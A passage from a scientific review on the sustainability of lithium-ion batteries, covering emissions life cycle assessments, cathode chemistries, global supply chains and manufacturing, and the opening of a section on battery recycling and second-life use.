batteries will be a pressing topic. Developing recycling technologies that are both economically and environmentally favorable can largely enhance the sustainability of LIBs. Recycling can in turn reduce the energy consumption and emissions during the virgin battery production. Furthermore, government policies and legislation can have a significant impact on the supply chain, manufacturing, and recycling of LIBs. Here, we systematically evaluate the environmental impact of LIBs, cathode chemistry, battery manufacturing and supply chain, battery recycling, and government policies regarding their roles in the sustainable development of LIBs. Last but not least, we conceive a visionary scheme for future LIB development and charging infrastructure construction.
Sustainability Assessment
The capability of LIBs to power EVs and store electricity generated from renewable energy sources has led to the erroneous public perception that LIBs are "zero-emission" technologies. In reality, LIBs, just like other batteries, are essential tools to store and release electrical energy. The fact that LIB production is energy-and resource-intensive, and that current electricity generation still heavily relies on fossil fuels, can potentially cause environmental concerns. Moreover, disposal of spent LIBs without recycling could be detrimental to the environment. Life cycle assessment (LCA) is a systematic analysis of the potential environmental impacts of products, processes, or services throughout their entire life cycle. [7] It is generally accepted as a standard methodology to quantify the environmental influences of the production, usage, and recycling of LIBs.
Many LCA studies have been conducted to assess the environmental impacts of the production of different LIB chemistries including LiFePO 4 (LFP), LiNi x Mn y Co 1−x−y O 2 (NMC), LiMn 2 O 4 (LMO), and LiNi x Co y Al 1−x−y O 2 (NCA), but their results are far from agreement. [8] The reported cradle-to-gate GHG emissions for battery production (including raw materials extraction, materials production, cell and component manufacturing, and battery assembling as shown in Figure 2) range from 39 to 196 kg CO 2 -eq per kWh of battery capacity with an average value of 110 kg CO 2 -eq per kWh of battery capacity. [8b-8j] The discrepancies in GHG emissions in prior studies can be attributed to a variety of reasons such as different battery chemistries, regions of manufacturers, assumptions in LCA models, and modeling approaches to estimating energy demand in battery manufacturing. [8g,j] LFP, NMC, and LMO are the most studied battery chemistries in LCA mainly due to their popularity in the current EV market and availability of the manufacturing data from the battery industry. Peters et al. critically analyzed a wide array of LCA studies of battery production and found that LMO has the lowest GHG emissions among the three battery chemistries, followed by NMC and LFP based on the averages of results from published studies. [8g] Hao et al. examined GHG emissions from LIB production in China and reported a similar conclusion that the production of LMO automotive LIBs leads to the lowest GHG emissions and the production of LFP leads to the highest GHG emissions. [8f ] GHG emissions of LIB production could also vary with the locations of manufacturers due to different quality of electricity used and electricity generation source. [8f,j] For example, the production of LFP, NMC, and LMO batteries in China has nearly three times higher emissions than that in the US because electricity generation in China relies more on coal (Figure 1c). [8f ] Besides battery chemistries and regions of manufacturers, the approach for modeling the battery manufacturing process to estimate energy demand also contributes to the wide discrepancies of the LCA results. [8g,9] Prior studies used two modeling approaches to estimate the total energy demand in battery manufacturing: 1) the bottomup approach which uses data from theoretical simulations or lab-scale experiments of the critical processes in the manufacturing line, and 2) the top-down approach which uses data from a real manufacturing plant. It was found that the latter approach usually results in a much higher estimated energy demand in battery manufacturing compared to the bottomup approach. For example, using the top-down approach, Kim et al. assessed the cradle-to-gate GHG emissions from massproduced LIB used in the Ford Focus EVs based on the primary energy data from the battery cell and pack industries. [8c] In Kim et al.'s study, the estimated GHG emission from the cell and pack manufacturing process is 65 kg CO 2 -eq per kWh of battery capacity, which is over one order of magnitude higher than the range of 1.5-1.9 kg CO 2 -eq estimated by other studies using the bottom-up approach. [8c] Furthermore, the real industrial manufacturing data are critical in LCA to obtain legitimate and practically informative results.
Prior LCA studies agreed that battery electric vehicle (BEV) production generates more GHG emissions than ICEV production does. Hawkins et al. found that the cradle-to-gate GHG emissions associated with EV production are almost twice that associated with ICEV production, and battery production contributes 35% to 41% of the GHG emissions from EV production. [8b] This finding is supported by Kim et al., who reported a 39% increase in GHG emissions switching from ICEV to EV in vehicle production. [8c] Hao et al. also indicated that there is around 30% increase in GHG emissions for EV production compared to that of traditional vehicles. [8f ] The higher GHG emissions associated with EV production in comparison to ICEV production is mainly because of the high GHG emissions from the production of battery, generator, and motor, i.e., the electric powertrain system. Although EV production has higher environmental impacts, extending the system boundary to include the use phase of EV (as shown in Figure 2) leads to a clear advantage of EV compared to ICEV because EVs offer higher powertrain efficiency and zero tailpipe emissions. Hawkins et al. found that light-duty EVs powered by the present European electricity mix offer a 10% to 24% decrease in GHG emissions relative to ICEVs assuming 150 000 km lifetime of EVs, and extending the lifetime of EVs to 200 000 km boosts the environmental benefits of 27% to 29% decrease in GHG emissions. [8b] In another study of the comparison between EVs and ICEVs, it was found that transport services with an EV result in a 35.6% (in percentage of the EV, 37 700 kg CO 2 -eq) decrease in GHG emissions compared to an ICEV, [8a] which is in general agreement with Hawkins et al.'s study. In addition, electricity generation source plays a vital role in GHG emissions. EVs powered by coal electricity can lead to an increase in GHG emissions compared to ICEVs. [8h] Therefore, it is vital to promote clean electricity sources to power EVs to maximize their environmental benefits. Although global warming potential (GWP), as expressed in GHG emissions, is the most frequently assessed environmental impact category (EIC) in the majority of LCA studies, other critical EIC, such as abiotic depletion (ADP), acidification, eutrophication (EP), human toxicity (HTP), and ozone depletion (ODP), are equally, sometimes even more, important to assess the environmental impacts of EV technology. Studies have raised concerns that production and use of EVs could potentially lead to increases in HTP, EP, and ADP categories, mainly emanating from the EV supply chain. [8b,h,10] Recycling spent LIBs reduces the demand for virgin raw materials and the toxic waste entering the environment, which can potentially decrease the environmental impacts of the battery life cycle. [8j] However, the environmental benefit of LIB recycling depends on the recycling route and battery chemistry. In a comprehensive study conducted by Ciez and Whitacre, the authors examined the GHG emissions associated with recycling NMC, LFP, and NCA battery cells using three recycling routes: pyrometallurgical, hydrometallurgical, and direct cathode recycling. [8i] It was found that for NMC and NCA cells, there is a median reduction (roughly 0.2-1 kg CO 2 -eq per kg of battery) in GHG emissions from hydrometallurgical and direct cathode recycling. However, pyrometallurgical recycling of NMC and NCA cells results in net increases in GHG emissions compared to no recycling, mainly because of the high energy consumption of the high-temperature processing and the loss of lithium in slag in pyrometallurgical recycling. For LFP cells, all three cycling routes result in net increases in GHG emissions due to the relatively small gain from recovering iron materials in LFP cells (compared with Ni and Co materials in NMC and NCA), indicating that recycling LFP cells may not be sustainable from GWP perspectives. Among the three cycling routes, direct cathode recycling offers the highest environmental benefits because it avoids the energy-and chemical-intensive thermochemical unit operations and maintains the cathode's crystal structure and internal energy. However, there are concerns regarding the quality of cathode materials recovered from direct cathode cycling and this route has not been proved at a commercial scale. Ciez and Whiteacre's findings were supported by a recent study that assessed the environmental impacts of advanced hydrometallurgical recycling of LIBs based on primary data from a battery recycling company. [11] In this study, high environmental benefits (12-25% reduction of GHG emissions in comparison to no recycling) are obtained via advanced hydrometallurgical recycling of NMC and NCA cells mainly because of the recovery of precious cobalt and nickel, but recycling of LFP cells is proved not to be environmentally sustainable. The substantial difference in the environmental impacts of recycling different battery chemistries highlights the necessity of developing a battery chemistry-specific approach. Yang et al. also showed that the preprocessing steps, such as collecting, sorting, dismantling of spent LIBs, and transport between recycling facilities could contribute substantially to the emissions. [8j] In addition to being recycled, spent battery packs recovered from end-of-life EV could be reused in stationary applications as part of "smartgrid," and this scenario has been demonstrated to be environmentally beneficial. [12] However, its reliability and economic feasibility need to be further examined as the reuse of spent LIBs in "smart-grid" has not yet been developed commercially.
Besides the environmental considerations, economic analysis of LIB recycling is also of great concern because it determines the industrial selection of different recycling technologies for profitability. However, detailed economic evaluations of the entire recycling process and comprehensive comparison of different recycling routes and battery chemistries are relatively scarce probably because there are few recycling processes operating at the commercial scale. The profitability of battery recycling depends on two main factors, namely, the costs of collecting and processing spent batteries and the revenues of selling recovered materials. Yang et al. reviewed the economic benefits of different battery materials. [8j] The authors showed LCO recycling exhibits the best economy, followed by NMC. However, recycling Fe-or Mn-based cathodes that are free of valuable metals like Ni and Co leads to negative net economic value.
[8j] Lin et al. found that the recycling of LFP cathode material is marginally profitable, about $196 for recycling 1 ton of spent LFP batteries, which is mainly due to the low price of the recycled chemicals and high leaching reagent (acetic acid) consumption. [13] On the other hand, recycling LCO cathode materials could be highly profitable due to the high prices of Co and Li metals. According to Lin et al.'s economic analysis, recycling 1 ton of spent LCO powders can result in a total profit of $31032 using the conventional sulfation roasting technique. [14] Regarding the popular NMC battery, Xiong et al. analyzed the entire remanufacturing cycle which includes chemicals recycling, cathode remanufacturing, and cell remanufacturing processes. [15] The authors found that the potential cost-saving from hydrometallurgical remanufacturing of NMC battery cells is about $1870 per ton compared with the production of batteries from virgin materials. Selection of recycling route also plays a major role in determining the economics of the spent battery recycling and it becomes evident that direct recycling is the most economic route compared with the energy-and chemicalintensive pyrometallurgical and hydrometallurgical routes. [8j] However, the quality of the recycled cathode materials needs to be assessed to meet the standard of reuse. Overall, the currently limited studies indicate that the economic feasibility of battery recycling highly depends on the battery chemistry and recycling route. In addition, the cost of recycling at different locations varies significantly but the revenue is similar due to global trading. [8j] Therefore, the locations of recycling should be taken into consideration in practice.
Cathode Materials
The LCA studies showed cathode materials are a substantial contributor to GHG emissions and energy consumption for manufacturing LIBs. [8h,i,16] LIBs were first commercialized by Sony Corporation in 1991, adopting LiCoO 2 (LCO) as the cathode and graphite as the anode. [17] As graphite remains the primary anode in most commercial LIBs at present, the bottleneck regarding energy density is still cathodes. From 1991 to the 2010s, the price of LIBs has dropped by nearly 97%. [6] The cathode is the largest cost contributor among all battery components according to the cost model Ziegler et al. developed. [6] Efforts to boost cell charge density and lower cathode prices accounted for 38% and 14% of the LIB cost reduction, respectively. [6] Therefore, manipulating cathode design at the materials level is essential to the sustainability of the LIB industry. Several factors need to be considered when evaluating a cathode material, including but not limited to electrochemical performance (e.g., energy density, cycle life), raw material abundance, cost, and carbon emissions during production. These factors are largely dependent on the transition metals in cathodes. Here, we categorize the state-of-the-art cathodes by their chemical compositions, especially their transition metals ( Table 1). LCO is widely applied in consumer electronics due to its high energy density, good conductivity, and high discharge voltage. However, LCO is unsuitable for large-scale applications due to the toxicity, scarcity, and high cost of Co. Shortly after the successful commercialization of LCO in the 1990s, the Nibased cathode LiNiO 2 (LNO) received much attention. [18] LNO is an isostructural compound to LCO and has a similar theoretical capacity (275 mAh g -1 ) but avoids the problematic Co. However, severe Li/Ni cation mixing and phase transformation issues in LNO lead to its low stability. [19] The inherent low stability brings about durability and safety concerns, which hinder its commercialization even today. The battery community has made great efforts in enhancing the performance of LNO and other Ni-rich variants. [20] Introducing several other metal cations (e.g., Mn, Al, Co) to partially substitute Ni is one of the most successful practices to optimize LNO. This is how NMC and NCA came into play. [21] NMC and NCA are families of cathodes that have various ratios of Ni to other metal cations in the chemical formula. The cycling and thermal stability are enhanced, but the energy density is limited with lower Ni content. NMC and NCA have promoted the development of the automotive battery industry in the past decade. Moving toward higher Ni contents has become the trend of the Ni-based layered cathode development as the demand for high energy density increases. However, this is not simply traveling back to LNO. Various approaches have been applied to balance the energy density and stability, such as doping and coating. [22] In the meantime, decreasing or eliminating Co in NMC and NCA has become more pressing. Co contributes a significant portion to the entire cost and carbon emissions of cathode production. [8h] Besides, the child labor and human rights issues during the Co mining have drawn criticism widely. Therefore, Ni-rich Co-free cathodes have gained extensive attention recently. A variety of metal cations were selected to replace Co to improve the stability of Ni-rich cathodes. [23] Ni-based cathodes will persist due to the advantage of high energy density before more appealing cathodes appear. However, Ni will eventually become limited and expensive. The IEA forecasted that the demand for Ni and Co in clean energy applications will increase 40-fold from 2020 to 2050. [16] The LIB supply may evolve dynamically as the mineral extracting technologies develop and more mineral resources are discovered. However, such a rapid increase in demand for Ni and Co can barely be digested without partially shifting away from the Nirich chemistry. Additionally, the demand increase will further induce price volatility of raw materials.
The exploration of Ni-free and Co-free cathodes never stops. LFP is one of the most successfully commercialized cathodes, possessing long cycle life, high stability, and safety. [24] The only transition metal adopted in LFP is Fe, which is abundant, www.advancedsciencenews.com inexpensive, and environmentally friendly. However, the energy density of LFP is relatively low compared to Ni-based cathodes, and the conductivity is intrinsically low. [25] Therefore, LFP requires further processing, such as coating and particle size engineering. [26] Mn is another inexpensive, abundant, and low-toxicity metal. LiMnPO 4 (LMP) is an isostructural compound to LFP with similar theoretical capacity but higher operating potential, thereby giving higher energy density than LFP. [24a,27] The polyanion framework leads to high oxygen stability and safety. However, the slow Li kinetics and low electronic conductivity result in inferior rate performance. LMO is another promising Mn-based alternative to Ni-and Co-containing cathodes. [28] LMO has a spinel structure and a 3D Li ion transport framework compared to the 2D layered structure of Ni-and Co-based cathodes. Therefore, LMO possesses excellent rate capability and high power density, which is often applied in power tools. However, LMO suffers from short cycle life especially at elevated temperatures (>50 °C) due to the structural degradation and Mn dissolution issues, and the energy density is relatively low. [29] A successful demonstration of LMO is its application in EVs by blending LMO with NMC to exploit the advantages of both materials. In this case, LMO improves acceleration with high power density and NMC supports long-distance driving with high energy density. [30] It was also reported that NIO Inc. has announced to adopt NMC and LFP hybrid battery packs in EVs. [31] This approach can be a temporary solution to reduce the reliance on Ni and Co during the transition to Ni-and Co-free cathodes. Meanwhile, it is crucial to develop high-energy cathodes that are not substantially reliant on Ni or Co. LiNi 0.5 Mn 1.5 O 4 (LNMO) is a low-Ni Mnbased spinel cathode material. LNMO has a high working potential (4.7-4.9 V vs Li/Li + ) and high energy density (around 650 Wh kg −1 ) at the materials level. [32] The high power density of LNMO also makes it a good candidate for power tools. However, the decomposition of conventional liquid electrolytes at high voltage, inferior electronic conductivity, and Mn dissolution issues raise concerns on the cycling stability and safety, which impedes the commercialization of LNMO. [33] There was a clear shift toward Ni-based cathodes and higher Ni content for EV batteries as higher energy density was in large demand, but Ni-and Co-free cathodes regained attention in recent years. The share of NMC and NCA materials in electric LDVs has experienced a steady growth from 2014 to 2019. [34] In 2019, NMC and NCA accounted for more than 80% of total cathode materials in new electric LDVs around the world. [34] LFP is primarily adopted in China, and the LFP share of all cathodes decreased from 60% in 2014 to around 10% in 2019. [34] LMO has also experienced a decreasing market share year by year possibly due to the growing energy density need. However, the worldwide increasing demand for Ni and Co drove the cost of these raw materials higher as the battery chemistry leaned to Ni-rich NMC and NCA materials. Furthermore, the COVID-19 pandemic has caused extensive damage to the global economy, driving up the cost of EVs. The supply and price of Ni and Co can be greatly impacted by geopolitical instability and wars. [35] The LIBs with modest energy density can satisfy the daily commuting needs of most EV consumers. High energy density is less significant as fast [45] Ni and Co containing Increasing energy density with higher Ni content; lower cost and less toxicity than LCO Low thermal and cycling stability and safety concern with higher Ni content EVs, stationary energy storage Ni-rich and Co-free More choice of metals and more flexible cathode design; high energy density; low cost Low stability at high voltage; immature synthesis route and large-scale production Research [40] www.advenergymat.de www.advancedsciencenews.com charging develops and more charging infrastructures are constructed. Therefore, LFP undergoes a resurgence due to its safety, low cost, and fast charging capability. The LFP market share across all EV cathodes grew from about 10% in 2019 to 19% in 2020 and 24% in 2021. [31] Introducing excess Li to the cathodes is another strategy to further enhance the battery energy density. Li-rich layered oxides (LLOs) are a series of high-energy Mn-based cathodes. In the 1990s, Thackeray et al. demonstrated the Li 2 MnO 3 -stabilized layered materials and reported xLi 2 MnO 3 (1−x)LiMnO 2 . [36] Shortly after that, more metal ions were incorporated and the LLOs family was expanded to xLi 2 MnO 3 (1−x)LiMO 2 (M = Ni, Mn, Co). [37] We want to highlight that the nature and history of these materials, either solid solution or composite, are still under debate. LLOs have high discharge capacity and benefit from the use of low cost, nontoxic Mn. However, the voltage decay, low rate capability, and low initial Coulombic efficiency issues bring difficulties to their commercialization. [38] The high voltage operation condition of LLOs induces more oxygen loss and lowers the cycling stability. Furthermore, compatible electrolytes at high voltages are rare, which further hampers the practical applications of LLOs. Many researchers have been attempting to understand the degradation mechanism of LLOs and enhance their electrochemical performance, but LLOs are still primarily at the research level at present. [39] Disordered rocksalt (DRX) cathodes, another class of Li excess materials, have recently obtained extensive research attention. DRX cathodes have various choices of 3d and 4d metals in contrast to the conventional layered oxides that use particular scarce metals. [40] The design of chemical compositions for DRX cathodes is more flexible. These earth-abundant and inexpensive metals, such as Mn, Fe, and Cr, can be utilized more efficiently. Therefore, DRX cathodes are a promising alternative to existing commercial cathodes due to their wide range of raw materials, cathode compositions, and high energy density. However, the development of DRX cathodes is still limited to the lab research. The synthetic routes and scale-up production are immature at the current stage. Li et al. comprehensively reviewed the progress and potential hurdles for the commercialization of DRX cathodes. [41] To enable superior capacity, the DRX cathode particles are normally pulverized into nanoparticles for shorter Li diffusion distances. The nanosized particles lead to large surface area and more parasitic reactions at the surface, resulting in faster performance decay. The active material to carbon and binder ratio is low for DRX cathodes to achieve better conductivity and Li kinetics. To the best of our knowledge, the normal active material mass loading is around 70% and the highest is 80% in the literature, [41] which is significantly lower than the loading of commercial cathodes. However, the Li diffusivity of these Li-excess DRX cathodes is still remarkably lower than that of conventional layered oxides by orders of magnitude, which raises Li kinetics problems. [41] Such low active material loading and small particle size bring challenges to enhancing the volumetric energy density in practical uses. For these Liexcess cathodes, oxygen redox reaction can readily take place due to the population of high energy Li-O-Li state, which could induce oxygen loss at the particle surface and irreversible transition metal migration. [42] These undesired structural transformations can cause capacity and voltage fading and eventually performance degradation. All these hurdles currently impede the commercialization of Li-excess cathodes. In addition, the availability and price of Li should be addressed when developing Li-excess materials as Li is the most essential metal in all types of LIBs. Additionally, conversion-type cathodes normally require significantly cheaper and more abundant elements from the Earth's crust, such as chalcogens. For example, Li-S batteries have relatively high energy density and low cost. However, the large volume expansion and the shuttle effect of soluble species lead to performance degradation hindering their further applications in EVs. [43] Overall, no single electrode material can suit all application scenarios. Distinct applications require different advantages of specific cathodes, such as the high energy density of Ni-rich NMC, and the stability and low cost of LFP. Each of the cathodes discussed is expected to undergo advancement and they will co-exist for different applications, but the general trend will be toward a more sustainable approach.
Shifting from Ni and Co-based cathodes to sustainable materials will become the general trend as the minerals become more limited, similar to the transition from fossil fuels to green energy resources. However, Ni and Co-based cathodes still possess an appealing advantage of high energy density that can practically convert to long driving mileage in EVs. Comprehensive reviews on LIB electrode materials suggested that various chemistries and configurations for LIBs will still be present for specialized applications. [30,44] There are several approaches to make the Ni-and Co-free cathodes more competitive not only at the cathode level, but also at the anode and battery pack levels: 1) advancement of anode materials, such as Li metal and Si anodes, can greatly improve the cell-level energy density; 2) optimizing the form factor of the individual cell and battery pack can further enhance the performance of batteries. Furthermore, the development of associated supporting facilities can reduce the mileage anxiety and the demand for high-energy electrodes: 1) developing fast charging and more efficient charging methods (e.g., wireless charging during driving); 2) constructing more distributed charging stations; 3) combining battery charging and battery pack swapping methods for different types of EVs.
Supply Chain and Manufacturing
More practical factors beyond materials design need to be considered in industrial manufacturing, such as supply chain and battery pack manufacturing. The LIB supply chain can be tracked back to the extraction and processing of raw minerals. A volatile supply chain or inefficient manufacturing may offset the performance benefit promoted by electrode materials. The mining and processing of LIB raw materials are more scattered across the world, compared with the procedures of fossil fuels (Figure 3). The uneven distribution of essential raw minerals may potentially give rise to geopolitical challenges and impact the global LIB industry. For example, Ni is a predominant metal in commercial cathodes for LIBs. Russia is one of the major countries that extract and refine Ni mines (Figure 3a,b). Due to the Russia-Ukraine war, the price of Ni almost doubled within one week from late February to early March in 2022. [35a] The IEA reported that the total battery cost could increase by 6% if the prices of Ni or Li were doubled. [4] Contemporary Amperex Technology Co. Ltd. (CATL), the largest LIB manufacturer in the world, has announced to raise prices for some battery products due to raw materials cost increase. [46] Accordingly, some EV companies, such as Tesla, Rivian, and BYD, have raised the prices of their EVs due to the increasing supply [4,48,75] b) Share of fossil fuels and mineral processing in 2018, 2019, and 2020. [4,48,62] c) LIB manufacturing capacity by country in 2016, 2019, and 2020. [57,63,65] The area of the color-coded circles is proportional to the share (percentage) or capacity (GWh). NG: Natural gas. DRC: The Democratic Republic of the Congo. The shaded rings around specific circles are "error rings" calculated based on collecting data from different references. This figure only displays the top three countries for fossil fuel extraction and processing and the major contributing countries/regions in LIB cradle-to-gate processes for visualization. The quantitative results for more countries and regions can be referred to Tables S1-S3 in the Supporting Information. The distribution of LIB raw mineral materials is sporadic across the world, but raw material processing and LIB manufacturing are mainly in Asia. chain cost. [47] Therefore, evaluating the global supply chain and manufacturing capability is vital to gaining a comprehensive understanding and reasonable forecast of LIB development.
The fossil fuel supply chain has been established and remained relatively stable, whereas the LIB supply chain is under development and evolving rapidly. The primary oil producers are the United States (US), Russia, and Saudi Arabia, and the top three oil refining countries are the US, China, and Russia (Figure 3a,b). [4] Regarding the natural gas production and distribution, the major producing countries are the US, Russia, and Iran, and the top three exporting countries are Qatar, Australia, and the US (Figure 3a,b). [4] In contrast, the global competition for the LIB supply chain has just begun. The distribution of the essential minerals for producing LIBs is scattered globally. In 2019 and 2020, three major Ni mine extraction countries are Indonesia, the Philippines, and Russia, which accounted for the global share of 29.8-33.0%, 12.0-15.7%, 10.1-11.3%, respectively ( Figure 3a and Table S1, Supporting Information). [4,48] For the global share of Co mine extraction, the Democratic Republic of the Congo (DRC) dominates with 69.0-70.4%, and Australia and Russia contribute 4.0-4.2%, 4.0-4.7%, respectively ( Figure 3a and Table S1, Supporting Information). [4,48a] The top three contributing countries to the global share of Li mining are Australia (48.7-52.0%), Chile (21.9-22.0%), and China (13.0-17.0%). [4,48a] Given the dispersed distribution of raw materials, the LIB supply chain requires worldwide collaborations. Moreover, the leading countries for the mining of certain materials may change as new minerals are discovered and mining technology improves. For example, a recent assessment of worldwide metal reserves indicated that the top-reserve countries for Li 2 CO 3 , Ni, and Co mines are Chile, Indonesia, and DRC, which possess 52 670 1000 metric tons, 28 750 1000 metric tons, and 2970 1000 metric tons, respectively. [49] However, unexplored regions that have considerable potential for mineral resources can potentially be a game-changer.
Assessing the future demand-supply balance of LIB raw materials is challenging because of the uncertain factors, including but not limited to the pace of automotive electrification and spent EV battery recycling, reliance on Ni-and Co-based cathodes, supply from new mining resources (e.g., seabed), production efficiency enhancement by technology improvement, and corresponding policies. It is still controversial in the literature if Co supply will meet the demand in the coming decades. [50] Tisserant and Pauliuk estimated that the Co reserve in the ground will be sufficient to supply to at least 2050. [51] Sverdrup et al. have created a model to assess the long-term Co supply. [52] The authors predicted that the supply of Co will stay sufficient until 2130 and reach a peak level in the period of 2040-2050. The price of Co could experience a sharp increase after 2050. From 2080, Co recycling rate will increase and Co supply from recycling will exceed primary extraction in response to the increased price. One potential concern of these earlier studies is the underestimation of the automotive electrification ambitions and corresponding Co demand. On the other hand, some studies are relatively conservative and less optimistic. Zeng et al. suggested that although battery technology improvement and recycling can bring long-term Co supply sustainability, there will be an inevitable Co shortage during 2028-2033. [53] Valero et al. also predicted that Co demand will exceed supply as early as 2030. [54] Some studies also projected a possible Ni shortage in the upcoming years. Valero et al. showed a bottleneck period for Ni, when the demand exceeds the supply, is expected to be 2027-2029. [54] This prediction agrees with another study that forecasted there will be Ni deficit by 2028. [55] It is commonly believed that Li supply will not be a constraint in this century, but recycling is vital to avoid an early supply deficit. [56] Regional supply and geopolitical factors can add discrepancies to the estimation of global mineral demand-supply risk. The uncertainties of Co supply mostly arise from the heavy reliance on the production from the DRC and the unstable political environment in the DRC (Figure 3a). [57] If the scope, however, is focused on regional supply, 96% of the imported Co in the European Union (EU) was from Russia. [58] Therefore, the global estimation might not apply to the forecast of regional supply. In addition, competition for raw materials exists between different regions, adding more uncertainties to the global LIB supply chain. Sun et al. evaluated the competition intensities of 15 LIB-related commodities (lithium mineral, cobalt ore, nickel ore, etc.) of 238 countries and regions in 2019. [59] For example, the competition for lithium hydroxide and lithium carbonate between Japan and South Korea is the most intense among all competitions analyzed. [59] Both countries heavily relied on the import of lithium raw materials for battery manufacturing. The competition between China and Finland for cobalt ore is also rather intense because they are the top two cobalt refining countries while the domestic cobalt reserves are insufficient (Figure 3a,b). [59] Further details can be referred to the original reference. [59] Mineral processing capability also plays a crucial role in the LIB supply chain besides mineral reserves. The mineral reserves may not necessarily reflect the exact demand in the LIB industry. The reason is that LIB production normally needs high purity precursors, which require further processing after mining and specific mineral sources. [57] For example, Class 1 Ni sulfate (Ni impurity of 99.8% or greater) that is eligible for LIBs is mostly produced from Ni sulfide ores, which only accounts for around 40% of available Ni reserves. [57,60] Such strict requirements on raw materials also bring challenges to recycling. The fact that many essential metals for LIBs are mainly produced as byproducts of other metal mining further complicates the LIB supply chain. [57] For instance, over 80% of Co is produced as byproducts of Ni and Cu. [61] The worldwide distribution of mineral processing is relatively concentrated. China has the largest processing volumes for multiple essential metals. The global share of China for Li, Ni, Co, and Cu processing is 55.0-58.0%, 29.9-35.0%, 63.6-65.0%, and 39.8-40.0%, respectively ( Figure 3b and Table S2, Supporting Information). [4,48a,62] Other major processing countries are distributed in the rest of Asia, Europe, and South America. Separators are another critical component of LIBs, which serve as a physical barrier to prevent cell short-circuiting and electrolyte reservoir for Li transport. The major LIB separator manufacturers are located in Asia. China, Korea, Japan, and the US accounted for 43%, 28%, 21%, and 6% of the global separator manufacturing, respectively. [63] The separator market of Asia-pacific region is forecasted to undergo a rapid growth and will still be dominant in the next 5 years. [64] LIB manufacturing is the next key step. Regarding the share of the global LIB production in the past few years, China, the US, Europe, South Korea, and Japan accounted for 62.3-76.9%, 7.9-13.1%, 1.4-7.0%, 4.0-9.8%, and 3.2-11.8%, respectively (Figure 3c and Table S3, Supporting Information). [57,63,65] The statistics show that LIB manufacturing is dominated by Asia, especially China. More facilities will be established in Europe, North America, Australia, and Asia considering those under construction or planned. [66] China, Japan, and South Korea are rated first, second, and third in the 2020 LIB supply chain ranking, which is evaluated based on raw materials, manufacturing, battery demand, etc. [67] Europe and North America are progressing and their gap with Asia is narrowing. In 2021, the US and Germany moved up to second and third place, respectively, which is predicted to be maintained in 2026. [68] Additionally, Asian countries, including China, South Korea, and Japan, have vertically integrated the supply chain from raw materials processing to battery manufacturing. [57] In the 1990s, Japan determined to develop its LIB industry. The Japanese government supported the research and development (R&D) of private sectors and helped them establish low-cost manufacturing plants. [57] China and South Korea have copied the success of Japan through developing partnerships between the government and LIB industry and providing subsidies since the late 2000s. [57] The mature LIB supply chain and accumulated technology and production experience gave the Asian countries advantages in the EV era. The US and Europe did not focus on domestic LIB manufacturing until the late 2010s. Therefore, the supply chain is not as robust, and manufacturers are relatively inexperienced. [57] Overall, Asia has the edge on raw materials processing and LIB manufacturing at present, but Europe and North America are accelerating the construction of their supply chains.
The quality and efficiency are significant in the battery manufacturing. The manufacturing technology determines the manufacturing efficiency and battery performance, thereby impacting the manufacturing capacity. It was reported that the Ford Motor Company announced the deployment of the fifth-generation (5G) technology in manufacturing to enhance connectivity and achieve higher manufacturing efficiency. [69] Manufacturing technology and battery design largely stem from battery R&D. Public and private R&D is the major driving force for the LIB cost reduction in the past three decades. [6] Specifically, the R&D of chemistry and materials science has played a major role in the cost reduction. [6] Similar attempts may further reduce the cost and enhance the performance of LIBs in the future. In this regard, the US has a solid foundation for battery research and technology. The government has maintained a good strategic and financial support for the fundamental research. Recently, the US Department of Energy (DOE) announced to use $209 million for the vehicle battery research. [70] A battery management system is essential to keep the batteries in proper working condition. In EVs, semiconductors play an important role in the electronic control of automotive power systems, such as fast charging and reducing energy loss. [34] Semiconductor chips are also indispensable components in the power control systems of EVs. The interruption in any part of the supply chain may impact the whole production.
For example, the semiconductor industry has been hit hard since the outbreak of the COVID-19 pandemic. The production of vehicles is largely limited due to the shortage of semiconductor chips. [71] In 2019, the global share of the automotive semiconductor industry for Europe, the US, Japan, and China is 37%, 33%, 26%, and 2%, respectively. [34] Developing the semiconductor industry is equally important to build a robust supply chain for LIBs and EVs. In all, a resilient supply chain requires not only a stable raw material supply, but also joint effort from the related fields.
The EV industry is the largest market of LIBs. It can reflect the global competition of the LIB supply chain and manufacturing. EV sales are expected to have a steady growth of tens of millions each year in the next few decades. [72] In 2020, the top three countries possessing BEVs and plug-in hybrid electric vehicles are China, the US, and Germany. [73] In addition, EV penetration rate in the vehicle market indicates the intention of vehicle electrification. The top ten countries for EV share of new car sales in 2020 are all located in Europe thanks to their incentive policies. [72] More countries have sped up their pace in transitioning to EVs as the time approaches the pledge on carbon neutrality. LIBs will play a critical role in the skyrocketing growth of EVs. The LIB industry is less vulnerable to raw material disruption than fossil fuels to some extent because of the wide range of available electrode materials. Furthermore, the consumers will not be impacted immediately by the LIB supply chain interruption due to the relatively long life cycle of LIBs. For instance, the price of crude oil has recently hit a new record since 2008. [74] Every gasoline refill has a direct impact on ICEV owners. Although the manufacturing and sale of new EVs are affected by the LIB supply chain fluctuation, the operation of existing EVs is barely altered. In addition, fossil fuels require continuous inputs once combusted while minerals in LIBs can be reused and recycled. Therefore, a worldwide energy crisis for the LIB industry is unlikely to occur. However, the diversified mineral types and their concentrated geographical distributions bring more uncertainties to the supply chain. A stable supply chain is critical for the sustainable development of LIBs. Major LIB producing countries have been attempting to establish their domestic supply chains and gain an edge on the LIB manufacturing. A sustainable supply of raw materials is needed as a prerequisite. In this regard, developing local mining and processing abilities are essential for boosting domestic LIB manufacturing capacity. The competition between leading countries can accelerate the advancement of LIBs and the establishment of a global LIB industry ecosystem. On the other hand, a closer collaboration (e.g., multiyear agreement on supply) across the world and associated legislation are needed to achieve a sustainable supply chain.
Recycling
The proper processing of used LIBs has become a pressing and inevitable task as more first-generation EVs approach end-oflife and raw materials become resource-limited. At present, the global recovery rate of used LIBs is rather low. [76] A substantial amount of used LIBs is handled inefficiently and dangerously, such as by landfilling and illegal disposal. [76] The inappropriate processing has caused extensive damage to the environment, human health, and massive fire and explosion incidents. [76] Instead, giving used LIBs a "second life" through reusing, remanufacturing, and repurposing appears to be a promising strategy to harness the remaining energy. [76] For example, used EV LIBs can be repurposed for grid energy storage. However, there are few regulations for second-life LIBs at present. Corresponding legislation should be established in advance to avoid the potential chaos in the market as more used LIBs emerge.
